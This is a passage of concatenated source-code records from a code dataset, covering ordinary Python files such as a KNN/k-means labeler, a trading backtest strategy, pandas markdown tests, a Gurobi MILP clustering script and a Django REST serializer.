\"\\n\")\n\nf.close()\n","sub_path":"01-introduction-to-python/file-writer-example.py","file_name":"file-writer-example.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"631682010","text":"import logging\nimport numpy as np\nimport operator\nimport random\nfrom sklearn.cluster import KMeans\nimport torch\nfrom tqdm import tqdm\n\nclass Labeler():\n def __init__(self, features, labels, n_classes, idx_train, idx_val, idx_test):\n self.features = features\n self.labels = labels\n self.n_instances = len(self.labels)\n self.n_classes = n_classes\n self.idx_train = idx_train\n self.idx_val = idx_val\n self.idx_test = idx_test\n\n def get_knn_labels(self, knn):\n fake_labels = self.labels.clone()\n\n new_features = self.features.cpu().numpy()\n\n # 1. prepare training and test data\n train_X, train_y = new_features[self.idx_train], self.labels[self.idx_train]\n val_X, val_y = new_features[self.idx_val], self.labels[self.idx_val]\n\n if knn == -1:\n # 2. KNN -- selecting the optimal K based on validation set\n upper = len(self.idx_train) // 10\n K_list = [i*10 for i in range(1, upper+1)]\n cnt_same = {K: 0 for K in K_list}\n for i, (X, y) in tqdm(enumerate(zip(val_X, val_y))):\n diff = train_X - X\n dist = np.einsum('ij, ij->i', diff, diff)\n indice = np.argsort(dist)\n\n for K in K_list:\n selected_labels = train_y[indice[:K]]\n\n unique, count = np.unique(selected_labels, return_counts=True)\n\n assert(fake_labels[self.idx_val[i]] == y)\n label_list = unique[np.argwhere(count == np.amax(count)).flatten().tolist()].tolist()\n\n if y in label_list:\n cnt_same[K] += 1\n\n cnt_same = sorted(cnt_same.items(), key=operator.itemgetter(1))\n logging.info('cnt_same = {}'.format(cnt_same))\n best_K = cnt_same[-1][0]\n else:\n best_K = knn\n\n logging.info('best_k = {}'.format(best_K))\n\n # 3. KNN -- assign labels to validation nodes and testing nodes\n idx_test = list(set(range(self.n_instances)) - set(self.idx_train))\n test_X, test_y = new_features[idx_test], self.labels[idx_test]\n\n cnt_same_tot = 0\n for i, (X, y) in tqdm(enumerate(zip(test_X, test_y))):\n diff = train_X - X\n dist = np.einsum('ij, ij->i', diff, diff)\n indice = np.argsort(dist)\n\n selected_labels = train_y[indice[:best_K]]\n\n unique, count = np.unique(selected_labels, return_counts=True)\n\n assert(fake_labels[idx_test[i]] == y)\n label_list = unique[np.argwhere(count == np.amax(count)).flatten().tolist()].tolist()\n fake_labels[idx_test[i]] = random.sample(label_list, 1)[0]\n if y == fake_labels[idx_test[i]]:\n cnt_same_tot += 1\n\n logging.info('cnt_same / cnt_all = {} / {}'.format(cnt_same_tot, len(test_X)))\n return fake_labels\n\n\n def get_majority_labels(self, edges, assign_seed):\n fake_labels = self.labels.clone()\n\n np.random.seed(assign_seed)\n idx_unknown = list(set(range(self.n_instances)) - set(self.idx_train))\n neighbor = {idx : [0 for i in range(self.n_classes)] for idx in idx_unknown}\n for dst, src in edges.tolist():\n if dst in idx_unknown and src in idx_unknown:\n neighbor[src][np.random.randint(0, self.n_classes)] += 1\n neighbor[dst][np.random.randint(0, self.n_classes)] += 1\n elif dst in idx_unknown:\n neighbor[dst][self.labels[src]] += 1\n elif src in idx_unknown:\n neighbor[src][self.labels[dst]] += 1\n\n cnt_same = 0\n for idx, l in neighbor.items():\n fake_labels[idx] = int(np.argmax(l))\n if self.labels[idx] == fake_labels[idx]:\n cnt_same += 1\n\n logging.info('cnt_same / cnt_all = {} / {}'.format(cnt_same, len(neighbor)))\n return fake_labels\n\n\n def get_naive_labels(self, assign_seed):\n fake_labels = self.labels.clone()\n np.random.seed(assign_seed)\n idx_test = list(set(range(self.n_instances)) - set(self.idx_train))\n fake_labels[idx_test] = np.random.randint(0, self.n_classes, len(idx_test))\n return fake_labels\n\n\n def get_cluster_labels(self, features, n_clusters, quota=[], start=0, same_size=False):\n estimator = KMeans(init=f'k-means++', n_clusters=n_clusters, n_init=10)\n km = estimator.fit(features)\n\n if not same_size:\n return torch.LongTensor(km.labels_)\n\n else:\n d = km.transform(features)\n indice = np.zeros_like(d.T, dtype=int)\n for i, col in enumerate(d.T):\n indice[i,:] = np.argsort(col)\n\n labels = [-1] * len(features)\n ptr = [-1] * n_clusters\n nums = [0] * n_clusters\n while 1:\n flag = False\n for i, (a, b) in enumerate(zip(nums, quota)):\n if a < b:\n flag = True\n break\n\n if not flag:\n break\n\n for i in range(n_clusters):\n if nums[i] == quota[i]: continue\n while 1:\n ptr[i] += 1\n if labels[indice[i][ptr[i]]] == -1:\n labels[indice[i][ptr[i]]] = i\n nums[i] += 1\n break\n\n labels = np.asarray(labels) + np.repeat(start, len(labels))\n\n return torch.LongTensor(labels)\n\n\n def get_kmeans_labels(self, n_clusters=10, knn=-1, cluster_method='kmeans', same_size=False):\n fake_labels = self.get_knn_labels(knn)\n\n labels_vec = np.zeros((self.n_instances, self.n_classes))\n labels_vec[range(self.n_instances), fake_labels] = 1\n\n features = np.hstack((self.features.numpy(), labels_vec))\n\n if same_size:\n size = self.n_instances // n_clusters\n rem = self.n_instances % n_clusters\n quota = [size+1] * rem + [size] * (n_clusters-rem)\n logging.info(f'quota = {quota}')\n return self.get_cluster_labels(features, n_clusters, quota=quota, same_size=True)\n\n else:\n return self.get_cluster_labels(features, n_clusters)\n\n\n def get_random_labels(self, n_clusters=10, seed=42):\n np.random.seed(seed)\n return torch.LongTensor(np.random.randint(0, n_clusters, self.n_instances))\n\n\n def get_equal_size(self, total, size):\n total, size = int(total), int(size)\n rem = total % size\n num = total // size\n if rem == 0:\n return num, [size] * num\n\n v1 = (rem - 1) // num + 1\n v2 = (size - rem) // (num + 1)\n\n if v1 > v2:\n num += 1\n\n size = total // num\n rem = total % num\n\n return num, [size+1] * rem + [size] * (num-rem)","sub_path":"labeler.py","file_name":"labeler.py","file_ext":"py","file_size_in_byte":6946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"499557754","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nTASK_FAILED = \"task_failed\"\nTASK_COMPLETED = \"task_completed\"\n\nclass SlaveMsg:\n def __init__(self, tid, state, extra=None):\n self.tid = tid\n self.state = state\n self.extra = extra\n\n def __str__(self):\n s = \"SM: TID %s STATE %s\" % (self.tid, self.state)\n if self.extra:\n s += \" EXTRA %s\" % (self.extra,)\n\n return s\n\n\nFILE_READY = \"file_ready\"\n\nclass MasterMsg:\n def __init__(self, tid, cmd, fl=None):\n self.tid = tid\n self.cmd = cmd\n self.fl = fl\n\n def __str__(self):\n s = \"MM: TID %s STATE %s FL: %s\" % (self.tid, self.state, self.fl)\n return s\n","sub_path":"common/Protocol.py","file_name":"Protocol.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"40792945","text":"#Heather Stafford\n#5/9/18\n#fileDemo.py - how to read a file\n\nfile = open('engmix.txt')\n\nnumWords = 0\n\nfor line in file:\n if 'heath' in line:\n print(line.strip())\n numWords += 1\n \nprint(numWords)\n","sub_path":"fileDemo.py","file_name":"fileDemo.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"195359880","text":"\"\"\"\nПрограмма принимает файл с логами,\nи обрабатывает их регулярным выражением,\nс целью парсинга ip-адресов и выводом их количества\nв отдельный файл\n\"\"\"\nimport re\n\n\ndef openFile():\n\n file = enter_filename()\n regexps = enter_regExp()\n with open(file) as f:\n for log in f: # итерация строк файла\n for regexp in regexps: # итерация регулярных выражений\n lst_total = re.findall(regexp, log)\n for log_write in lst_total:\n with open(f\"NameOutputFile_{str(file).split('.')[0]}.{str(file).split('.')[-1]}\", \"a\") as f:\n f.write(f\"{log_write}\\n\")\n continue\n return regexps\n\n\ndef enter_regExp():\n regexps = [r'\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}', r'\\\"(.+)\\sHTTP.+?\\\"', ]\n while True:\n regexp = input(\"Please enter a regular expressions: \")\n if regexp != \"end\":\n regexps.append(regexp)\n continue\n else:\n break\n return regexps\n\n\ndef enter_filename():\n filename = input(\"Please, enter a your filename\")\n if filename == \"\": filename = \"test.log\"\n return filename\n\n\nif __name__ == '__main__':\n openFile()\n","sub_path":"Major.py","file_name":"Major.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"617533761","text":"# encoding: utf-8\n# 该策略思想来源自:https://www.quantopian.com/posts/mebane-fabers-tactical-asset-allocation\n# 该策略当价格超过k日均线则买入,反之退出\n\nimport datetime\nimport numpy as np\nimport pandas as pd\nimport sys\nimport argparse\n\nsys.path.append(\"../jsalpha/\")\n\nfrom backtest import Backtest\nfrom data import HistoricCSVDataHandler\nfrom event import OrderEvent\nfrom portfolio import Portfolio\nfrom strategy import Strategy\nfrom fetch import fetch_from_wind\nimport utils\n\nclass mebane_faber(Strategy):\n\n def __init__(self, bars, events, look_back=20):\n self.bars = bars\n self.symbol_list = self.bars.symbol_list\n self.events = events\n self.bought = self._calculate_initial_bought()\n self.look_back = look_back\n\n def _calculate_initial_bought(self):\n bought = {}\n for s in self.symbol_list:\n bought[s] = 'OUT'\n return bought\n\n def calculate_signals(self, event):\n if event.type == \"MARKET\":\n for symbol in self.symbol_list:\n bars = self.bars.get_latest_bars_values(symbol, \"close\", self.look_back)\n if bars.shape[0] < self.look_back:\n continue\n\n price = self.bars.get_latest_bar_value(symbol, \"close\")\n sma = bars.mean()\n if price > sma and self.bought[symbol] == 'OUT':\n order = OrderEvent(symbol, 'ALLBUY')\n self.events.put(order)\n self.bought[symbol] = 'LONG'\n if price < sma and self.bought[symbol] == 'LONG':\n order = OrderEvent(symbol, 'EXIT')\n self.events.put(order)\n self.bought[symbol] = 'OUT'\n\n # allow short\n if price < sma and self.bought[symbol] == 'OUT':\n order = OrderEvent(symbol, 'ALLSELL')\n self.events.put(order)\n self.bought[symbol] = 'SHORT'\n if price > sma and self.bought[symbol] == 'SHORT':\n order = OrderEvent(symbol, 'EXIT')\n self.events.put(order)\n self.bought[symbol] = 'OUT'\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--symbols\", help=\"securities\", default=\"000300.SH\", type=str)\n args = parser.parse_args()\n return args\n\nif __name__ == \"__main__\":\n csv_dir = \"../csv/\"\n args = get_args()\n start_date = \"2005-01-01\"\n end_date = \"2017-02-09\"\n symbol_list = args.symbols.split(',')\n fetch_from_wind(csv_dir, symbol_list, start_date, end_date)\n initial_capital = 100000.0\n heartbeat = 0.0\n\n backtest = Backtest(csv_dir,\n symbol_list,\n initial_capital,\n heartbeat,\n start_date,\n HistoricCSVDataHandler,\n Portfolio,\n mebane_faber)\n backtest.simulate_trading(plot=True)\n","sub_path":"strategy/mebane_faber.py","file_name":"mebane_faber.py","file_ext":"py","file_size_in_byte":3037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"398550378","text":"\"\"\"\nElabore un programa para calcular el numero armonico, este algoritmo se define por:\n\n F(N) = s1/s1 + s1/2 + s1/3 + s1/4 ... + s1/N\n\n(N): Es el numero de la secuencia.\n\n i=N\n ∑ (s1/i)\n i=s1\n\n\"\"\"\n\nsuma = 0\nn = int(input(\"N: \"))\n\nfor i in range(1, n+1):\n suma += 1/i # s1/s1, s1/2, s1/3, s1/4, s1/5\n\n# for i in range(3)\n# [0, s1, 2]\n\n# for i in range(s1, 3+s1)\n# [s1, 2, 3]\n\nprint(f\"La sumatoria es: {round(suma, 4)}\")\n","sub_path":"2021-1/s2/ej5.py","file_name":"ej5.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"465605097","text":"from io import StringIO\n\nimport pytest\n\nimport pandas as pd\n\npytest.importorskip(\"tabulate\")\n\n\ndef test_simple():\n buf = StringIO()\n df = pd.DataFrame([1, 2, 3])\n df.to_markdown(buf=buf)\n result = buf.getvalue()\n assert (\n result == \"| | 0 |\\n|---:|----:|\\n| 0 | 1 |\\n| 1 | 2 |\\n| 2 | 3 |\"\n )\n\n\ndef test_other_tablefmt():\n buf = StringIO()\n df = pd.DataFrame([1, 2, 3])\n df.to_markdown(buf=buf, tablefmt=\"jira\")\n result = buf.getvalue()\n assert result == \"|| || 0 ||\\n| 0 | 1 |\\n| 1 | 2 |\\n| 2 | 3 |\"\n\n\ndef test_other_headers():\n buf = StringIO()\n df = pd.DataFrame([1, 2, 3])\n df.to_markdown(buf=buf, headers=[\"foo\", \"bar\"])\n result = buf.getvalue()\n assert result == (\n \"| foo | bar |\\n|------:|------:|\\n| 0 \"\n \"| 1 |\\n| 1 | 2 |\\n| 2 | 3 |\"\n )\n\n\ndef test_series():\n buf = StringIO()\n s = pd.Series([1, 2, 3], name=\"foo\")\n s.to_markdown(buf=buf)\n result = buf.getvalue()\n assert result == (\n \"| | foo |\\n|---:|------:|\\n| 0 | 1 \"\n \"|\\n| 1 | 2 |\\n| 2 | 3 |\"\n )\n\n\ndef test_no_buf(capsys):\n df = pd.DataFrame([1, 2, 3])\n result = df.to_markdown()\n assert (\n result == \"| | 0 |\\n|---:|----:|\\n| 0 | 1 |\\n| 1 | 2 |\\n| 2 | 3 |\"\n )\n","sub_path":"Botnets/App/App Web/PDG-env/lib/python3.6/site-packages/pandas/tests/io/formats/test_to_markdown.py","file_name":"test_to_markdown.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"451064668","text":"# -*- coding: utf-8 -*-\n\nimport io\nimport ast\n\ntry:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n\n\ndef get_version():\n \"\"\" Parses authzync.py and fetches the version attribute from the syntax tree\n :return: authzync version\n \"\"\"\n with io.open('authzync.py') as input_file:\n for line in input_file:\n if line.startswith('__version__'):\n return ast.parse(line).body[0].value.s\n\nwith io.open('README.rst') as readme:\n setup(\n name='authzync',\n py_modules=['authzync'],\n version=get_version(),\n description='SVN AuthZ-LDAP sync tool',\n long_description=readme.read(),\n install_requires=['ldap3'],\n author='Robert Wikman',\n author_email='rbw@vault13.org',\n maintainer='Robert Wikman',\n maintainer_email='rbw@vault13.org',\n url='https://github.com/rbw0/authzync',\n download_url='https://github.com/rbw0/authzync/tarball/%s' % get_version(),\n keywords=['subversion', 'ldap', 'authz', 'sync'],\n platforms='any',\n classifiers=[\n 'Programming Language :: Python',\n ],\n license='MIT',\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"337117439","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport dill\nfrom gurobipy import *\nfrom shared import *\nfrom milpshared import *\n\ndef MIP_model_BigM(LABEL, numTracts, numModels, numFeatures, runtimelimit, M_val):\n # read in feature value and label value from dataframe\n DF = readindata_std(LABEL, numFeatures)\n df = DF.copy()\n\n M = M_val\n\n # feature data\n # create feature value list Xij\n X_val = df.iloc[:, 1:numFeatures+1].values.tolist()\n Y = df.iloc[:, -1].tolist() # create label value list Yi\n\n model = Model()\n\n# Basically, I've just dropped lines with a Z -- since the weight regularizer was removed, this part is no longer used (should not affect optimization, but good to remove it just to be safe). -Scott\n\n # Add variables\n X = {}\n E = {}\n W = {}\n B = {}\n C = {}\n for i in range(numTracts):\n for j in range(numFeatures):\n X[(i, j)] = X_val[i][j]\n\n for i in range(numTracts):\n for k in range(numModels):\n E[(i, k)] = model.addVar(\n lb=0, vtype=GRB.CONTINUOUS, name=\"E%d,%d\" % (i, k))\n\n for j in range(numFeatures):\n for k in range(numModels):\n W[(j, k)] = model.addVar(vtype=GRB.CONTINUOUS, name=\"W%d,%d\" % (j, k))\n\n for k in range(numModels):\n B[k] = model.addVar(vtype=GRB.CONTINUOUS, name=\"B%d\" % k)\n\n for i in range(numTracts):\n for k in range(numModels):\n C[(i, k)] = model.addVar(vtype=GRB.BINARY, name=\"C%d,%d\" % (i, k))\n\n model.update()\n\n # Add constraints\n for i in range(numTracts):\n model.addConstr(quicksum(C[(i, k)] for k in range(numModels)) == 1)\n\n for i in range(numTracts):\n for k in range(numModels):\n model.addConstr(quicksum(W[(j, k)]*X[(i, j)] for j in range(\n numFeatures)) + B[k] - Y[i] - E[(i, k)] <= M*(1-C[(i, k)]))\n\n for i in range(numTracts):\n for k in range(numModels):\n model.addConstr(quicksum(-W[(j, k)]*X[(i, j)] for j in range(\n numFeatures)) - B[k] + Y[i] - E[(i, k)] <= M*(1-C[(i, k)]))\n\n # set objective\n model.setObjective( quicksum( quicksum( E[(i,k)] for i in range(numTracts)) for k in range(numModels)))\n model.Params.timeLimit = runtimelimit # 12 hours\n# model.Params.LogFile = filepath+\"MIP_bigM_real_log_m\"+str(numModels)+\"_f\"+str(numFeatures)\n model.optimize()\n# model.write(filepath+\"MIP_bigM_real_m\"+str(numModels)+\"_f\"+str(numFeatures)+\".sol\")\n\n df = pd.DataFrame(columns=['Dec_Var', 'Val'])\n for v in model.getVars():\n df = df.append({'Dec_Var': v.varName, 'Val': v.x}, ignore_index=True)\n\n error_list = []\n error_list = [x.X for x in model.getVars() if x.VarName.find('E') != -1]\n\n# for b in myrange(0,numTracts*numModels-1,numModel):\n# if model_list_raw[b]==1:\n# mo\n\n bias_list = [x.X for x in model.getVars() if x.VarName.find('B') != -1]\n\n coef_list = [x.X for x in model.getVars() if x.VarName.find('W') != -1]\n\n MAE = 0\n for a in range(0, numTracts*numModels):\n MAE = MAE + error_list[a]\n MAE = MAE/numTracts\n\n MSE = 0\n for a in range(0, numTracts*numModels):\n MSE = MSE + math.pow(error_list[a], 2)\n MSE = MSE/numTracts\n\n# weights_df = df.iloc[211*numModels:(211*numModels+numFeatures*numModels),:]\n# intercept_df = df.iloc[(211*numModels+numFeatures*numModels):(211*numModels+numFeatures*numModels+numModels),:]\n# model_df = df.iloc[(211*numModels+numFeatures*numModels+numModels):(211*numModels+numFeatures*numModels+numModels+211*numModels),:]\n\n # return df, error, weights_df, intercept_df, model_df,model.MIPGap*100\n return df, MAE, MSE, bias_list, coef_list, model.MIPGap*100\n\n\ndef collect_result(K, F):\n # k rows, f columns (k = # of clusters, f = # of features)\n MSElist = []\n MAElist = []\n Coeflist = []\n Biaslist = []\n resultlist = []\n\n for k in tqdm(range(2, K+1)):\n MSElist_sameCluster = []\n MAElist_sameCluster = []\n Coeflist_sameCluster = []\n Biaslist_sameCluster = []\n resultlist_sameCluster = []\n\n for f in range(2, F+1):\n\n # run the MILP model\n M_val = pairwise_distance(211, 'change_incpc', f,k)\n result, MAE, MSE, bias_list, coef_list, _ = MIP_model_BigM(\n 'change_incpc', 211, k, f, 3600, M_val)\n\n # recording training MAE, MSE for MILP\n MAElist_sameCluster.append(MAE)\n MSElist_sameCluster.append(MSE)\n\n # recording Bias term for MILP\n Biaslist_sameCluster.append(bias_list)\n\n # recording regression coefficients for MILP\n coef_model = []\n for a in range(0, k):\n # getting all coefficients for one cluster\n flat_list = []\n for b in range(0, f):\n flat_list.append(coef_list[a+b*k])\n coef_model.append(flat_list)\n\n feature_list = list(readindata_std(\n 'change_incpc', f).iloc[:, 1:f+1].columns)\n Coef = pd.DataFrame({'feature': feature_list})\n for c in range(0, k):\n Coef['Cluster'+str(c+1)] = coef_model[c]\n Coeflist_sameCluster.append(Coef)\n\n # convert result into dataframe, each tract pair with its cluster assignment\n result_df = result.copy()\n tractid_df = readindata_std('change_incpc', f)\n result_df = result_df[result_df['Dec_Var'].str.contains(\"C\")]\n result_df = result_df[result_df['Val'] > 0.9]\n model_list = []\n for _, row in result_df.iterrows():\n assigned_label_text = row['Dec_Var']\n assigned_label = int(assigned_label_text[-1])+1\n model_list.append(assigned_label)\n tractid_df = tractid_df.assign(model=model_list)\n tractid_df = tractid_df.set_index('tractid')\n resultlist_sameCluster.append(tractid_df)\n\n bias_List = []\n for h in range(0, k):\n bias_List.append([bias_list[h]])\n with open(f'{resultpath}milp/rawresults/result_{k}{f}.pickle','wb') as f:\n pickle.dump((resultlist_sameCluster,Coeflist_sameCluster),f)\n\n\n # recording result for k-means as the initialization with lowest MAE\n MAElist.append(MAElist_sameCluster)\n MSElist.append(MSElist_sameCluster)\n Coeflist.append(Coeflist_sameCluster)\n Biaslist.append(Biaslist_sameCluster)\n resultlist.append(resultlist_sameCluster)\n\n return MSElist, MAElist, (Coeflist, Biaslist), resultlist\n\n\n\n\ndef overlap(K, F, MILP_result_df):\n MILP_result = MILP_result_df.copy()\n with open(resultpath + 'kmeansresultlist.pickle','rb') as f:\n Kmeans_result_df = pickle.load(f)\n Kmeans_result = Kmeans_result_df.copy()\n # for each combination of # of clusters & # of features\n kmeans_pairID_list = []\n kmeans_intersection_list = []\n Jaccard_AB_list = []\n Jaccard_A_list = []\n Jaccard_B_list = []\n Jaccard_index_sum_list = []\n Jaccard_index_min_list = []\n for k in range(2, K+1):\n for f in range(2, F+1):\n kmeans_cluster = []\n MILP_cluster = []\n\n # store tractid within each cluster for kmeans and MILP seperately\n for a in range(0, k):\n Kmeans_result[k-2][f-2] = Kmeans_result[k-2][f-2].reset_index()\n temp_kmeans = Kmeans_result[k-2][f -\n 2].loc[Kmeans_result[k-2][f-2]['model'] == a+1]\n kmeans_cluster.append(\n temp_kmeans['tractid'].values.flatten().tolist())\n\n MILP_result[k-2][f-2] = MILP_result[k-2][f-2].reset_index()\n temp_MILP = MILP_result[k-2][f -\n 2].loc[MILP_result[k-2][f-2]['model'] == a+1]\n MILP_cluster.append(\n temp_MILP['tractid'].values.flatten().tolist())\n\n Kmeans_result[k-2][f-2] = Kmeans_result[k -\n 2][f-2].set_index('tractid')\n MILP_result[k-2][f-2] = MILP_result[k -\n 2][f-2].set_index('tractid')\n\n # pair kmeans and MILP cluster to maximize interseted elements\n kmeans_pairID = []\n kmeans_intersection = []\n Jaccard_AB = []\n Jaccard_A = []\n Jaccard_B = []\n Jaccard_index_sum = []\n Jaccard_index_min = []\n\n kmeans_cluster_size = []\n kmeans_cluster_size_ordered = []\n for x in range(0, k):\n kmeans_cluster_size.append(len(kmeans_cluster[x]))\n kmeans_cluster_size_ordered.append(len(kmeans_cluster[x]))\n kmeans_cluster_size_ordered.sort(reverse=True)\n\n kmeans_cluster_order = []\n for y in range(0, k):\n kmeans_cluster_order.append(\n kmeans_cluster_size.index(kmeans_cluster_size_ordered[y]))\n\n for z in range(0, k):\n b = kmeans_cluster_order[z]\n intersection_list = []\n intersection_length_list = []\n for c in range(0, k):\n intersection = []\n intersection = list(\n set(kmeans_cluster[b]).intersection(MILP_cluster[c]))\n intersection_list.append(intersection)\n intersection_length_list.append(len(intersection))\n\n milpID = intersection_length_list.index(\n max(intersection_length_list))\n\n while (milpID in kmeans_pairID):\n intersection_length_list[milpID] = -1\n milpID = intersection_length_list.index(\n max(intersection_length_list))\n\n kmeans_pairID.append(milpID)\n kmeans_intersection.append(intersection_list[milpID])\n Jaccard_AB.append(intersection_length_list[milpID])\n Jaccard_A.append(len(kmeans_cluster[b]))\n Jaccard_B.append(len(MILP_cluster[milpID]))\n # jaccard index over sum\n Jaccard_index_sum.append(intersection_length_list[milpID]/(len(\n kmeans_cluster[b])+len(MILP_cluster[milpID])-intersection_length_list[milpID]))\n if len(MILP_cluster[milpID]) != 0:\n Jaccard_index_min.append(\n intersection_length_list[milpID]/min(len(kmeans_cluster[b]), len(MILP_cluster[milpID])))\n else:\n Jaccard_index_min.append(\n intersection_length_list[milpID]/len(kmeans_cluster[b]))\n\n kmeans_pairID_list.append(kmeans_pairID)\n kmeans_intersection_list.append(kmeans_intersection)\n Jaccard_AB_list.append(Jaccard_AB)\n Jaccard_A_list.append(Jaccard_A)\n Jaccard_B_list.append(Jaccard_B)\n Jaccard_index_sum_list.append(Jaccard_index_sum)\n Jaccard_index_min_list.append(Jaccard_index_min)\n\n # visualize the overlap on a map\n matched_tracts = []\n for d in range(0, k):\n matched_tracts = matched_tracts + kmeans_intersection[d]\n\n matched_tract_df = Kmeans_result_df[k-2][f-2].copy()\n for index, row in matched_tract_df.iterrows():\n if (index in matched_tracts):\n matched_tract_df.at[index, 'model'] = 1\n else:\n matched_tract_df.at[index, 'model'] = 0\n\n print(str(k) + ' cluster, '+str(f)+' feature:')\n for e in range(0, k):\n print('Jaccard index (sum bottom) for cluster ' +\n str(e+1)+' :'+str(Jaccard_index_sum[e]))\n print('Jaccard index (min bottom) for cluster ' +\n str(e+1)+' :'+str(Jaccard_index_min[e]))\n print('Jaccard AnB for cluster ' +\n str(e+1)+' :'+str(Jaccard_AB[e]))\n print('Jaccard A for cluster ' +\n str(e+1)+' :'+str(Jaccard_A[e]))\n print('Jaccard B for cluster ' +\n str(e+1)+' :'+str(Jaccard_B[e]))\n\n # yellow is not matched, green is matched tracts\n cluster_map(matched_tract_df, k,f,'matched_milp')\n\n return kmeans_pairID_list, kmeans_intersection_list, Jaccard_AB_list, Jaccard_A_list, Jaccard_B_list, Jaccard_index_sum_list, Jaccard_index_min_list\n\nif __name__ == '__main__':\n MILP_result = display_result(2, 2, 'milp_test1', collect_result)\n\nwith open(f'{resultpath}bigmresults/results.pickle','wb') as f:\n pickle.dump(overlap(\n 5, 5, MILP_result), f, protocol=4)\n\nwith open(f'{resultpath}bigmresults/milp.pickle','wb') as f:\n pickle.dump(MILP_result,f,protocol=4)\n","sub_path":"code/MILPtests.py","file_name":"MILPtests.py","file_ext":"py","file_size_in_byte":12949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"304298135","text":"from rest_framework import serializers\n\nfrom books.models import HeroInfo, BookInfo\n\n\nclass BookInfoSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = BookInfo\n fields = '__all__'\n\n\nclass BookRelateField(serializers.RelatedField):\n \"\"\"自定义用于处理图书的字段\"\"\"\n def to_representation(self, value):\n return 'Book: %d %s' % (value.id, value.btitle)\n\n\nclass HeroInfoSerializer(serializers.Serializer):\n hname = serializers.CharField(label='角色名称', required=True, max_length=20)\n hcomment = serializers.CharField(label='角色描述', required=False)\n hgender = serializers.CharField(label='角色性别', required=False)\n image = serializers.ImageField(label='角色图片', required=True)\n\n # note--自定义序列化器中外键需要用特殊字段指定, 被关联对象由系统搜索, 不用手动传递\n # tips--序列化使用read_only字段表示该字段由服务器展示, 客户端不需要传递\n # 方法一: 外键显示关联对象ID\n # hbook = serializers.PrimaryKeyRelatedField(label='图书', read_only=True)\n\n # 方法二: 外键显示关联对象的输出字符串__str__\n # hbook = serializers.StringRelatedField(label='图书', read_only=True)\n\n # 方法三: 外键显示关联对象的API接口\n # hbook = serializers.HyperlinkedRelatedField(label='图书', read_only=True, view_name='books-detail')\n\n # 方法四: 外键显示关联对象的指定字段\n # hbook = serializers.SlugRelatedField(label='图书', read_only=True, slug_field='bpub_date')\n\n # 方法五: 外键显示关联对象的序列化器, 自动关联到该书的对象\n # hbook = BookInfoSerializer()\n\n # 方法六: 自定义to_representation定义输出格式\n hbook = BookRelateField(read_only=True)\n\n # note--凡是RelateField字段都会表示该字段是外键, 会自动绑定到外键关联对象\n","sub_path":"Django005C/books/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"275348557","text":"import csv\nimport statistics\n\ndef get_stats(number_of_centroids, number_of_cars):\n staticcasemaximums = []\n staticcasemedians = []\n staticcasemeans = []\n basecasemaximums = []\n basecasemedians = []\n basecasemeans = []\n maximumdifferences = []\n mediandifferences = []\n meandifferences = []\n while number_of_centroids < 15:\n try:\n f = open('./staticcase-2020-12-09to11/routing_data_centroids' + str(number_of_centroids) + '_cars' + str(number_of_cars) + '.csv', 'r')\n staticcasecsvreader = csv.reader(f, delimiter=',')\n staticcasenumbers = []\n for row in staticcasecsvreader:\n if row[6] == 'Maximum Vehicle Repair Time':\n continue\n elif row[6] != '':\n staticcasenumbers.append(float(row[6]))\n else:\n staticcasenumbers.append(0.0)\n staticcasemaximums.append(max(staticcasenumbers))\n staticcasemedians.append(statistics.median(staticcasenumbers))\n staticcasemeans.append(statistics.mean(staticcasenumbers))\n f = open('./basecase-2020-12-09to11/routing_data_centroids' + str(number_of_centroids) + '_cars' + str(number_of_cars) + '.csv', 'r')\n basecasecsvreader = csv.reader(f, delimiter=',')\n basecasenumbers = []\n for row in basecasecsvreader:\n if row[6] == 'Maximum Vehicle Repair Time':\n continue\n elif row[6] != '':\n basecasenumbers.append(float(row[6]))\n else:\n basecasenumbers.append(0.0)\n basecasemaximums.append(max(basecasenumbers))\n basecasemedians.append(statistics.median(basecasenumbers))\n basecasemeans.append(statistics.mean(basecasenumbers))\n maximumdifferences.append([b - s for s, b in zip(staticcasemaximums, basecasemaximums)])\n mediandifferences.append([b - s for s, b in zip(staticcasemedians, basecasemedians)])\n meandifferences.append([b - s for s, b in zip(staticcasemeans, basecasemeans)])\n\n if number_of_cars > number_of_centroids * 4:\n number_of_centroids += 1\n number_of_cars = number_of_centroids * 2\n else:\n number_of_cars += number_of_centroids\n except:\n if number_of_cars > number_of_centroids * 4:\n number_of_centroids += 1\n number_of_cars = number_of_centroids * 2\n else:\n number_of_cars += number_of_centroids\n print('skipping')\n maximumdifferences = [j for sub in maximumdifferences for j in sub]\n mediandifferences = [j for sub in mediandifferences for j in sub]\n meandifferences = [j for sub in meandifferences for j in sub]\n print(statistics.mean(maximumdifferences), statistics.stdev(maximumdifferences))\n 